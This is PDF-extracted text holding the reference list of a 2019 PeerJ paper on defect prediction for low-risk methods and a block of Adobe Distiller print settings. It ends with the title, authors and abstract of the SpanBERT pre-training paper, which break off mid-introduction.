https://peerj.com/computer-science/ Bayardo RJ, Agrawal R, Gunopulos D. 1999. Constraint-based rule mining in large, dense databases. In: Proceedings of the 15th International Conference on Data Engineering (ICDE’99). Piscataway: IEEE, 188–197 DOI 10.1109/ICDE.1999.754924. Bertolino A. 2007. Software testing research: achievements, challenges, dreams. In: Proceedings of Future of Software Engineering (FOSE’07). Los Alamitos: IEEE Computer Society, 85–103 DOI 10.1109/FOSE.2007.25. Bird C, Bachmann A, Aune E, Duffy J, Bernstein A, Filkov V, Devanbu P. 2009. Fair and balanced? bias in bug-fix datasets. In: Proceedings of 7th Joint Meeting of the European Software Engineering Conference and the Symposium on the Foundations of Software Engineering (ESEC/FSE’09). New York: ACM, 121–130. Bird C, Nagappan N, Murphy B, Gall H, Devanbu P. 2011. Don’t touch my code! examining the effects of ownership on software quality. In: Proceedings of 8th Joint Meeting of the European Software Engineering Conference and the Symposium on the Foundations of Software Engineering (ESEC/FSE’11). New York: ACM, 4–14. Bowes D, Hall T, Harman M, Jia Y, Sarro F, Wu F. 2016. Mutation-aware fault prediction. In: Proceedings of 25th International Symposium on Software Testing and Analysis (ISSTA’16). New York: ACM, 330–341. Catal C. 2011. Software fault prediction: a literature review and current trends. Expert Systems with Applications 38(4):4626–4636 DOI 10.1016/j.eswa.2010.10.024. Catal C, Diri B. 2009. A systematic review of software fault prediction studies. Expert Systems with Applications 36(4):7346–7354 DOI 10.1016/j.eswa.2008.10.027. Chawla NV, Bowyer KW, Hall LO, Kegelmeyer WP. 2002. Smote: synthetic minority over-sampling technique. Journal of Artificial Intelligence Research 16:321–357 DOI 10.1613/jair.953. Czibula G, Marian Z, Czibula IG. 2014. Software defect prediction using relational association rule mining. Information Sciences 264:260–278 DOI 10.1016/j.ins.2013.12.031. D’Ambros M, Lanza M, Robbes R. 2012. Evaluating defect prediction approaches: a benchmark and an extensive comparison. Empirical Software Engineering 17(4–5):531–577 DOI 10.1007/s10664-011-9173-9. Jed Wing MKC, Weston S, Williams A, Keefer C, Engelhardt A, Cooper T, Mayer Z, Kenkel B, Benesty M, Lescarbeau R, Ziem A, Scrucca L, Tang Y, Candan C, Hunt T, the R Core Team. 2017. caret: Classification and Regression Training. R package version 6.0-76. Available at https://topepo.github.io/caret/. Giger E, D’Ambros M, Pinzger M, Gall HC. 2012. Method-level bug prediction. In: Proceedings of 6th International Symposium on Empirical Software Engineering and Measurement (ESEM’12). New York: ACM, 171–180. Gosling J, Joy B, Steele G, Bracha G, Buckley A. 2013. The Java language specification, Java SE 7 edition, february 2012. Available at http://docs.oracle.com/javase/specs/jls/se7/html/index.html (accessed 31 March 2019). Hahsler M, Buchta C, Gruen B, Hornik K. 2017. arules: mining association rules and frequent itemsets. R package version 1.5-2. Available at http://mhahsler.github.io/arules/. Hahsler M, Gruen B, Hornik K. 2005. arules—A computational environment for mining association rules and frequent item sets. Journal of Statistical Software 14(15):1–25 DOI 10.18637/jss.v014.i15. Hall T, Beecham S, Bowes D, Gray D, Counsell S. 2012. A systematic literature review on fault prediction performance in software engineering. IEEE Transactions on Software Engineering 38(6):1276–1304 DOI 10.1109/tse.2011.103. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 24/28 http://dx.doi.org/10.1109/ICDE.1999.754924 http://dx.doi.org/10.1109/FOSE.2007.25 http://dx.doi.org/10.1016/j.eswa.2010.10.024 http://dx.doi.org/10.1016/j.eswa.2008.10.027 http://dx.doi.org/10.1613/jair.953 http://dx.doi.org/10.1016/j.ins.2013.12.031 http://dx.doi.org/10.1007/s10664-011-9173-9 https://topepo.github.io/caret/ http://docs.oracle.com/javase/specs/jls/se7/html/index.html http://mhahsler.github.io/arules/ http://dx.doi.org/10.18637/jss.v014.i15 http://dx.doi.org/10.1109/tse.2011.103 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Haas R, Niedermayr R, Jurgens E. 2019. Teamscale: tackle technical debt and control the quality of your software. In: Proceedings of the 2nd International Conference on Technical Debt (TechDebt'19 Tools Track). Piscataway: IEEE. Hassan AE. 2009. Predicting faults using the complexity of code changes. In: Proceedings of 31st International Conference on Software Engineering (ICSE’09). Los Alamitos: IEEE Computer Society, 78–88 DOI 10.1109/ICSE.2009.5070510. Hata H, Mizuno O, Kikuno T. 2012. Bug prediction based on fine-grained module histories. In: Proceedings of 34th International Conference on Software Engineering (ICSE’12). Piscataway: IEEE, 200–210. He Z, Shu F, Yang Y, Li M, Wang Q. 2012. An investigation on the feasibility of cross-project defect prediction. Automated Software Engineering 19(2):167–199 DOI 10.1007/s10515-011-0090-3. Heinemann L, Hummel B, Steidl D. 2014. Teamscale: Software quality control in real-time. In: Proceedings of 36th International Conference on Software Engineering (ICSE’14), New York: ACM. Herzig K, Just S, Zeller A. 2013. It’s not a bug, it’s a feature: How misclassification impacts bug prediction. In: Proceedings of 35th International Conference on Software Engineering (ICSE’13). Piscataway: IEEE, 392–401. Hummel B. 2014. McCabe’s cyclomatic complexity and Why We Don’t Use It. Available at https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ (accessed 31 March 2019). Just R, Jalali D, Ernst MD. 2014. Defects4J: a database of existing faults to enable controlled testing studies for Java programs. In: Proceedings of 23rd International Symposium on Software Testing and Analysis (ISSTA’14). Tool demo, New York: ACM, 437–440. Karthik R, Manikandan N. 2010. Defect association and complexity prediction by mining association and clustering rules. In: Proceedings of 2nd International Conference on Computer Engineering and Technology (ICCET’10). Piscataway: IEEE, Vol. 7, 569. Khoshgoftaar TM, Gao K, Seliya N. 2010. Attribute selection and imbalanced data: problems in software defect prediction. In: Proceedings of 22nd International Conference on Tools with Artificial Intelligence (ICTAI’10). Piscataway: IEEE, Vol. 1, 137–144. Kim S, Whitehead EJ Jr, Zhang Y. 2008. Classifying software changes: clean or buggy? IEEE Transactions on Software Engineering 34(2):181–196 DOI 10.1109/tse.2007.70773. Kim S, Zhang H, Wu R, Gong L. 2011. Dealing with noise in defect prediction. In: Proceedings of 33rd International Conference on Software Engineering (ICSE’11). Piscataway: IEEE, 481–490. Kim S, Zimmermann T, Whitehead EJ Jr, Zeller A. 2007. Predicting faults from cached history. In: Proceedings of 29th International Conference on Software Engineering (ICSE’07). Los Alamitos: IEEE Computer Society, 489–498. Lee T, Nam J, Han D, Kim S, In HP. 2011. Micro interaction metrics for defect prediction. In: Proceedings of 8th Joint Meeting of the European Software Engineering Conference and the Symposium on the Foundations of Software Engineering (ESEC/FSE’11). New York: ACM, 311–321. Longadge R, Dongre S, Malik L. 2013. Class imbalance problem in data mining: review. International Journal of Computer Science and Network 2(1):83–87. Ma B, Dejaeger K, Vanthienen J, Baesens B. 2010. Software defect prediction based on association rule classification. In: Proceedings of 1st International Conference on E-Business Intelligence (ICEBI’10). Paris: Atlantis Press. McCabe TJ. 1976. A complexity measure. IEEE Transactions on Software Engineering 2(4):308–320. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 25/28 http://dx.doi.org/10.1109/ICSE.2009.5070510 http://dx.doi.org/10.1007/s10515-011-0090-3 https://www.cqse.eu/en/blog/mccabe-cyclomatic-complexity/ http://dx.doi.org/10.1109/tse.2007.70773 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ McCallum A, Nigam K. 1998. A comparison of event models for naive bayes text classification. In: Proceedings of Workshop on Learning for Text Categorization (AAAI-98-W7). Palo Alto, California: AAAI Press, Vol. 752, 41–48. Mende T, Koschke R. 2009. Revisiting the evaluation of defect prediction models. In: Proceedings of 5th International Conference on Predictor Models in Software Engineering (PROMISE’09). New York: ACM, 7. Meneely A, Williams L, Snipes W, Osborne J. 2008. Predicting failures with developer networks and social network analysis. In: Proceedings of 16th International Symposium on Foundations of Software Engineering (FSE’08). New York: ACM, 13–23. Menzies T, Di Stefano JS. 2004. How good is your blind spot sampling policy? In: Proceedings of 8th International Symposium on High Assurance Systems Engineering. Piscataway: IEEE, 129–138. Menzies T, Di Stefano JS, Chapman M, McGill K. 2002. Metrics that matter. In: Proceedings of 27th Annual NASA Goddard Software Engineering Workshop. Piscataway: IEEE, IEEE/NASA, 51–57. Menzies T, Di Stefano J, Orrego A, Chapman R. 2004. Assessing predictors of software defects. In: Proceedings of Workshop Predictive Software Models (PSM’04). Menzies T, Greenwald J, Frank A. 2007. Data mining static code attributes to learn defect predictors. IEEE Transactions on Software Engineering 33(1):2–13 DOI 10.1109/tse.2007.256941. Menzies T, Milton Z, Turhan B, Cukic B, Jiang Y, Bener A. 2010. Defect prediction from static code features: current results, limitations, new approaches. Automated Software Engineering 17(4):375–407 DOI 10.1007/s10515-010-0069-5. Menzies T, Stefano J, Ammar K, McGill K, Callis P, Davis J, Chapman R. 2003. When can we test less? In: Proceedings of 9th International Symposium on Software Metrics (SMS’03). Piscataway: IEEE, 98–110. Morisaki S, Monden A, Matsumura T, Tamada H, Matsumoto K-I. 2007. Defect data analysis based on extended association rule mining. In: Proceedings of 4th International Workshop on Mining Software Repositories (MSR’07). Los Alamitos: IEEE Computer Society. Nagappan N, Ball T. 2005. Use of relative code churn measures to predict system defect density. In: Proceedings of 27th International Conference on Software Engineering (ICSE’15). Piscataway: IEEE, 284–292. Nagappan N, Ball T, Zeller A. 2006. Mining metrics to predict component failures. In: Proceedings of 28th International Conference on Software Engineering (ICSE’06). New York: ACM, 452–461. NDepend. 2017. Code metrics definitions. Available at http://www.ndepend.com/docs/code- metrics#ILNestingDepth (accessed 8 August 2017). Niedermayr R, Röhm T, Wagner S. 2019. Dataset: Too trivial to test? Available at https://figshare.com/articles/Dataset_Too_Trivial_To_Test_/6194171. Ostrand TJ, Weyuker EJ, Bell RM. 2004. Where the bugs are. ACM SIGSOFT Software Engineering Notes. Vol. 29. New York: ACM, 86–96. Ostrand TJ, Weyuker EJ, Bell RM. 2005. Predicting the location and number of faults in large software systems. IEEE Transactions on Software Engineering 31(4):340–355 DOI 10.1109/tse.2005.49. Palomba F, Zanoni M, Fontana FA, De Lucia A, Oliveto R. 2016. Smells like teen spirit: improving bug prediction performance using the intensity of code smells. In: Proceedings. 32nd International Conference on Software Maintenance and Evolution (ICSME’16). Piscataway: IEEE, 244–255. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 26/28 http://dx.doi.org/10.1109/tse.2007.256941 http://dx.doi.org/10.1007/s10515-010-0069-5 http://www.ndepend.com/docs/code-metrics#ILNestingDepth http://www.ndepend.com/docs/code-metrics#ILNestingDepth https://figshare.com/articles/Dataset_Too_Trivial_To_Test_/6194171 http://dx.doi.org/10.1109/tse.2005.49 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Pascarella L, Palomba F, Bacchelli A. 2018. Re-evaluating method-level bug prediction. In: Proceedings of 25th International Conference on Software Analysis, Evolution and Reengineering (SANER’18). Piscataway: IEEE, 592–601. R Core Team. 2018. R: A language and environment for statistical computing. Version 3.5.1. Vienna: R Foundation for Statistical Computing. Available at https://www.R-project.org/. Rahman F, Devanbu P. 2011. Ownership, experience and effects: a fine-grained study of authorship. In: Proceedings of 33rd International Conference on Software Engineering (ICSE’11). New York: ACM, 491–500. Scanniello G, Gravino C, Marcus A, Menzies T. 2013. Class level fault prediction using software clustering. In: Proceedings of 28th International Conference on Automated Software Engineering (ASE’13). Piscataway: IEEE, 640–645. Shepperd M. 1988. A critique of cyclomatic complexity as a software metric. Software Engineering Journal 3(2):30–36 DOI 10.1049/sej.1988.0003. Shippey T, Hall T, Counsell S, Bowes D. 2016. So you need more method level datasets for your software defect prediction? Voilà! In: Proceedings of 10th International Symposium on Empirical Software Engineering and Measurement (ESEM’16). New York: ACM. Shivaji S, Whitehead EJ, Akella R, Kim S. 2013. Reducing features to improve code change-based bug prediction. IEEE Transactions on Software Engineering 39(4):552–569 DOI 10.1109/tse.2012.43. Simon GJ, Kumar V, Li PW. 2011. A simple statistical model and association rule filtering for classification. In: Proceedings of 17th International Conference on Knowledge Discovery and Data Mining (SIGKDD’11). New York: ACM, 823–831. Song Q, Shepperd M, Cartwright M, Mair C. 2006. Software defect association mining and defect correction effort prediction. IEEE Transactions on Software Engineering 32(2):69–82 DOI 10.1109/tse.2006.1599417. Torgo L. 2010. Data Mining with R, learning with case studies. Boca Raton: CRC Press. Turhan B, Menzies T, Bener AB, Di Stefano J. 2009. On the relative value of cross-company and within-company data for defect prediction. Empirical Software Engineering 14(5):540–578 DOI 10.1007/s10664-008-9103-7. Weyuker EJ, Ostrand TJ. 2008. What can fault prediction do for you? In: Proceedings of 2nd International Conference on Tests and Proofs (TAP’08). New York: Springer, 1–10. Witten IH, Frank E, Hall MA, Pal CJ. 2016. Data mining: practical machine learning tools and techniques. San Francisco: Morgan Kaufmann. Xia X, Lo D, Pan SJ, Nagappan N, Wang X. 2016. Hydra: massively compositional model for cross-project defect prediction. IEEE Transactions on Software Engineering 42(10):977–998 DOI 10.1109/tse.2016.2543218. Xu Z, Liu J, Luo X, Zhang T. 2018. Cross-version defect prediction via hybrid active learning with kernel principal component analysis. In: Proceedings of 25th International Conference on Software Analysis, Evolution and Reengineering (SANER’18). Piscataway: IEEE, 209–220. Zafar H, Rana Z, Shamail S, Awais MM. 2012. Finding focused itemsets from software defect data. In: Proceedings of 15th International Multitopic Conference (INMIC’12). Piscataway: IEEE, 418–423. Zhang H, Zhang X, Gu M. 2007. Predicting defective software components from code complexity measures. In: Proceedings of 13th Pacific Rim International Symposium on Dependable Computing (PRDC’07). Piscataway: IEEE, 93–96. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 27/28 https://www.R-project.org/ http://dx.doi.org/10.1049/sej.1988.0003 http://dx.doi.org/10.1109/tse.2012.43 http://dx.doi.org/10.1109/tse.2006.1599417 http://dx.doi.org/10.1007/s10664-008-9103-7 http://dx.doi.org/10.1109/tse.2016.2543218 http://dx.doi.org/10.7717/peerj-cs.187 https://peerj.com/computer-science/ Zhang F, Zheng Q, Zou Y, Hassan AE. 2016. Cross-project defect prediction using a connectivity- based unsupervised classifier. In: Proceedings of 38th International Conference on Software Engineering (ICSE’18). New York: ACM, 309–320. Zimmermann T, Nagappan N. 2008. Predicting defects using network analysis on dependency graphs. In: Proceedings of 30th International Conference on Software Engineering (ICSE’08). Piscataway: IEEE, 531–540. Zimmermann T, Nagappan N, Gall H, Giger E, Murphy B. 2009. Cross-project defect prediction: a large scale experiment on data vs. domain vs. process. In: Proceedings of 7th Joint Meeting of the European Software Engineering Conference and the Symposium on the Foundations of Software Engineering (ESEC/FSE’09). New York: ACM, 91–100. Zimmermann T, Premraj R, Zeller A. 2007. Predicting defects for eclipse. In: Proceedings of 3rd International Workshop on Predictor Models in Software Engineering (PROMISE’07). Washington, D.C.: IEEE Computer Society, 9. Niedermayr et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.187 28/28 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.187 Too trivial to test? An inverse view on defect prediction to identify methods with low fault risk Introduction Association Rule Mining Related Work IDP Approach Empirical Study Discussion Conclusion flink8 References << /ASCII85EncodePages false /AllowTransparency false /AutoPositionEPSFiles true /AutoRotatePages /None /Binding /Left /CalGrayProfile (Dot Gain 20%) /CalRGBProfile (sRGB IEC61966-2.1) /CalCMYKProfile (U.S. Web Coated \050SWOP\051 v2) /sRGBProfile (sRGB IEC61966-2.1) /CannotEmbedFontPolicy /Warning /CompatibilityLevel 1.4 /CompressObjects /Off /CompressPages true /ConvertImagesToIndexed true /PassThroughJPEGImages true /CreateJobTicket false /DefaultRenderingIntent /Default /DetectBlends true /DetectCurves 0.0000 /ColorConversionStrategy /LeaveColorUnchanged /DoThumbnails false /EmbedAllFonts true /EmbedOpenType false /ParseICCProfilesInComments true /EmbedJobOptions true /DSCReportingLevel 0 /EmitDSCWarnings false /EndPage -1 /ImageMemory 1048576 /LockDistillerParams false /MaxSubsetPct 100 /Optimize true /OPM 1 /ParseDSCComments true /ParseDSCCommentsForDocInfo true /PreserveCopyPage true /PreserveDICMYKValues true /PreserveEPSInfo true /PreserveFlatness true /PreserveHalftoneInfo false /PreserveOPIComments false /PreserveOverprintSettings true /StartPage 1 /SubsetFonts true /TransferFunctionInfo /Apply /UCRandBGInfo /Preserve /UsePrologue false /ColorSettingsFile (None) /AlwaysEmbed [ true ] /NeverEmbed [ true ] /AntiAliasColorImages false /CropColorImages true /ColorImageMinResolution 300 /ColorImageMinResolutionPolicy /OK /DownsampleColorImages false /ColorImageDownsampleType /Average /ColorImageResolution 300 /ColorImageDepth 8 /ColorImageMinDownsampleDepth 1 /ColorImageDownsampleThreshold 1.50000 /EncodeColorImages true /ColorImageFilter /FlateEncode /AutoFilterColorImages false /ColorImageAutoFilterStrategy /JPEG /ColorACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /ColorImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000ColorACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000ColorImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasGrayImages false /CropGrayImages true /GrayImageMinResolution 300 /GrayImageMinResolutionPolicy /OK /DownsampleGrayImages false /GrayImageDownsampleType /Average /GrayImageResolution 300 /GrayImageDepth 8 /GrayImageMinDownsampleDepth 2 /GrayImageDownsampleThreshold 1.50000 /EncodeGrayImages true /GrayImageFilter /FlateEncode /AutoFilterGrayImages false /GrayImageAutoFilterStrategy /JPEG /GrayACSImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /GrayImageDict << /QFactor 0.15 /HSamples [1 1 1 1] /VSamples [1 1 1 1] >> /JPEG2000GrayACSImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /JPEG2000GrayImageDict << /TileWidth 256 /TileHeight 256 /Quality 30 >> /AntiAliasMonoImages false /CropMonoImages true /MonoImageMinResolution 1200 /MonoImageMinResolutionPolicy /OK /DownsampleMonoImages false /MonoImageDownsampleType /Average /MonoImageResolution 1200 /MonoImageDepth -1 /MonoImageDownsampleThreshold 1.50000 /EncodeMonoImages true /MonoImageFilter /CCITTFaxEncode /MonoImageDict << /K -1 >> /AllowPSXObjects false /CheckCompliance [ /None ] /PDFX1aCheck false /PDFX3Check false /PDFXCompliantPDFOnly false /PDFXNoTrimBoxError true /PDFXTrimBoxToMediaBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXSetBleedBoxToMediaBox true /PDFXBleedBoxToTrimBoxOffset [ 0.00000 0.00000 0.00000 0.00000 ] /PDFXOutputIntentProfile (None) /PDFXOutputConditionIdentifier () /PDFXOutputCondition () /PDFXRegistryName () /PDFXTrapped /False /CreateJDFFile false /Description << /CHS <FEFF4f7f75288fd94e9b8bbe5b9a521b5efa7684002000500044004600206587686353ef901a8fc7684c976262535370673a548c002000700072006f006f00660065007200208fdb884c9ad88d2891cf62535370300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c676562535f00521b5efa768400200050004400460020658768633002> /CHT <FEFF4f7f752890194e9b8a2d7f6e5efa7acb7684002000410064006f006200650020005000440046002065874ef653ef5728684c9762537088686a5f548c002000700072006f006f00660065007200204e0a73725f979ad854c18cea7684521753706548679c300260a853ef4ee54f7f75280020004100630072006f0062006100740020548c002000410064006f00620065002000520065006100640065007200200035002e003000204ee553ca66f49ad87248672c4f86958b555f5df25efa7acb76840020005000440046002065874ef63002> /DAN <FEFF004200720075006700200069006e0064007300740069006c006c0069006e006700650072006e0065002000740069006c0020006100740020006f007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e007400650072002000740069006c0020006b00760061006c00690074006500740073007500640073006b007200690076006e0069006e006700200065006c006c006500720020006b006f007200720065006b007400750072006c00e60073006e0069006e0067002e0020004400650020006f007000720065007400740065006400650020005000440046002d0064006f006b0075006d0065006e0074006500720020006b0061006e002000e50062006e00650073002000690020004100630072006f00620061007400200065006c006c006500720020004100630072006f006200610074002000520065006100640065007200200035002e00300020006f00670020006e0079006500720065002e> /DEU <FEFF00560065007200770065006e00640065006e0020005300690065002000640069006500730065002000450069006e007300740065006c006c0075006e00670065006e0020007a0075006d002000450072007300740065006c006c0065006e00200076006f006e002000410064006f006200650020005000440046002d0044006f006b0075006d0065006e00740065006e002c00200076006f006e002000640065006e0065006e002000530069006500200068006f00630068007700650072007400690067006500200044007200750063006b006500200061007500660020004400650073006b0074006f0070002d0044007200750063006b00650072006e00200075006e0064002000500072006f006f0066002d00470065007200e400740065006e002000650072007a0065007500670065006e0020006d00f60063006800740065006e002e002000450072007300740065006c006c007400650020005000440046002d0044006f006b0075006d0065006e007400650020006b00f6006e006e0065006e0020006d006900740020004100630072006f00620061007400200075006e0064002000410064006f00620065002000520065006100640065007200200035002e00300020006f0064006500720020006800f600680065007200200067006500f600660066006e00650074002000770065007200640065006e002e> /ESP <FEFF005500740069006c0069006300650020006500730074006100200063006f006e0066006900670075007200610063006900f3006e0020007000610072006100200063007200650061007200200064006f00630075006d0065006e0074006f0073002000640065002000410064006f0062006500200050004400460020007000610072006100200063006f006e00730065006700750069007200200069006d0070007200650073006900f3006e002000640065002000630061006c006900640061006400200065006e00200069006d0070007200650073006f0072006100730020006400650020006500730063007200690074006f00720069006f00200079002000680065007200720061006d00690065006e00740061007300200064006500200063006f00720072006500630063006900f3006e002e002000530065002000700075006500640065006e00200061006200720069007200200064006f00630075006d0065006e0074006f00730020005000440046002000630072006500610064006f007300200063006f006e0020004100630072006f006200610074002c002000410064006f00620065002000520065006100640065007200200035002e003000200079002000760065007200730069006f006e0065007300200070006f00730074006500720069006f007200650073002e> /FRA <FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_w7xmeafrznavjlelreuofhde2i ---- SpanBERT: Improving Pre-training by Representing and Predicting Spans Mandar Joshi∗† Danqi Chen∗‡§ Yinhan Liu§ Daniel S. Weld†� Luke Zettlemoyer†§ Omer Levy§ † Allen School of Computer Science & Engineering, University of Washington, Seattle, WA {mandar90,weld,lsz}@cs.washington.edu ‡ Computer Science Department, Princeton University, Princeton, NJ danqic@cs.princeton.edu � Allen Institute of Artificial Intelligence, Seattle {danw}@allenai.org § Facebook AI Research, Seattle {danqi,yinhanliu,lsz,omerlevy}@fb.com Abstract We present SpanBERT, a pre-training method that is designed to better represent and predict spans of text. Our approach extends BERT by (1) masking contiguous random spans, rather than random tokens, and (2) training the span boundary representations to predict the entire content of the masked span, without relying on the individual token representations within it. SpanBERT consistently outperforms BERT and our better-tuned baselines, with substantial gains on span selection tasks such as question answering and coreference reso- lution. In particular, with the same training data and model size as BERTlarge, our single model obtains 94.6% and 88.7% F1 on SQuAD 1.1 and 2.0 respectively. We also achieve a new state of the art on the OntoNotes coreference resolution task (79.6% F1), strong perfor- mance on the TACRED relation extraction benchmark, and even gains on GLUE.1 1 Introduction Pre-training methods like BERT (Devlin et al., 2019) have shown strong performance gains using self-supervised training that masks individual words or subword units. However, many NLP tasks 